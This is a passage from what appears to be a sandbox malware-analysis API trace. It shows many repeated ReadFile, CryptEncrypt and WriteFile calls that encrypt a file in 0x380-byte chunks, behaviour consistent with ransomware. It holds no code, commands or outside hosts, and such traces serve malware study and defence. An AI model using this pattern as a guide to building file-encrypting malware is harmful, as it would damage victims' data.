pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.591] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.591] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.592] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.592] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.592] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.592] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.592] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.592] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.592] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.592] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.592] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.592] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.592] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.592] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.592] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.592] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.593] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.593] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.593] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.593] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.593] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.593] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.593] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.593] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.593] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.594] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.594] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.594] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.594] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.594] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.594] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.594] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.594] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.594] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.594] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.594] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.594] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.594] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.595] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.595] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.595] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.595] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.595] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.595] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.595] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.595] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.595] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.595] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.595] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.595] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.596] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.596] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.596] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.596] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.596] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.596] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.596] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.596] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.596] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.596] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.596] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.596] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.596] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.596] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.597] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.597] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.597] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.597] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.597] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.597] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.597] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.597] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.597] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.597] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.597] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.597] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.597] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.598] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.598] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.598] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.598] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.598] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.598] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.599] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.599] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.599] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.599] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.600] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.600] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.600] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, 